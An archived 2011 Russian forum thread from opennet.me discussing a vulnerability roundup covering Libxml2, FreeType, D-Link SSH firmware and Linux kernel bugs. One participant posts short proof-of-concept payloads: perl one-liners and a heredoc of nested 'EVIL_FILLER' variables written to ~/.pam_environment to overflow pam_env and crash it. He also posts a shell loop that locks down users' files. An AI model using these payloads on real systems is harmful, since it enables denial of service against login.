URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 81066
[ Назад ]

Исходное сообщение
"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено opennews , 30-Окт-11 23:33

Несколько недавно обнаруженных уязвимостей:

-  В открытой библиотеке Libxml2 найдены две уязвимости (http://secunia.com/advisories/46632/), вызванные обращением в коде к уже освобождённым блокам памяти. Теоретически уязвимости могут быть использованы для организации выполнения кода злоумышленника при обработке специально оформленных XPath-запросов. Проблема устранена в Git-репозитории проекта;
-  В библиотеке для рендеринга шрифтов FreeType 2.4.7 (http://sourceforge.net/projects/freetype) устранена опасная уязвимость (http://sourceforge.net/projects/freetype/files/freetype2/2.4...), которая может привести к выполнению кода злоумышленника при обработке специально скомпонованного шрифта Type 1;
-  В реализации SSH-сервера из состава прошивок некоторых продуктов D-Link (например, коммутаторы DES-3800 и беспроводные маршрутизаторы DWL-2100AP/DWL-3200AP) найдена опасная уязвимость (http://secunia.com/advisories/46637/), позволяющая удалённо выполнить свой код на оборуд...
URL:
Новость: http://www.opennet.me/opennews/art.shtml?num=32170

Содержание

Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li...,pavlinux, 23:33 , 30-Окт-11
- Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li...,pavlinux, 00:36 , 31-Окт-11
- Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li...,pavlinux, 19:06 , 31-Окт-11
Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li...,Аноним, 16:49 , 31-Окт-11
Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li...,Аноним, 16:54 , 01-Ноя-11

Сообщения в этом обсуждении

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено pavlinux , 30-Окт-11 23:33

> Переполнение буфера в функции "xfs_readlink()" может привести к
> выполнению кода злоумышленника при монтировании специально
> оформленного XFS-раздела;
Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку.

PAM :)
 
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print "A" x 256;' >> ~/.pam_environment
и ещё...
 
cat <<EOM >~/.pam_environmentEVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
 EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
 EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
 EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
 EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
 EOM

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено pavlinux , 31-Окт-11 00:36

Как вариант


for users in `ls /home/`
   do 
    echo -ne > $users/.pam_environment; 
    chown 65499:65499 $users/.pam_environment;
    chmod 0000 $users/.pam_environment;
done

Пущай мучаются :)

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено pavlinux , 31-Окт-11 19:06

> EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Кстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено Аноним , 31-Окт-11 16:49

очередной урожай уязвимостей ?
Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL; - O_O !!!
Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия )))
Возможность инициирования краха ядра - дважды )))!!!!
В реализации SSH-сервера - а вот это интерестно, пригодится

"Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Li..."
Отправлено Аноним , 01-Ноя-11 16:54

А где взять новую прошивку для DWL-2100AP?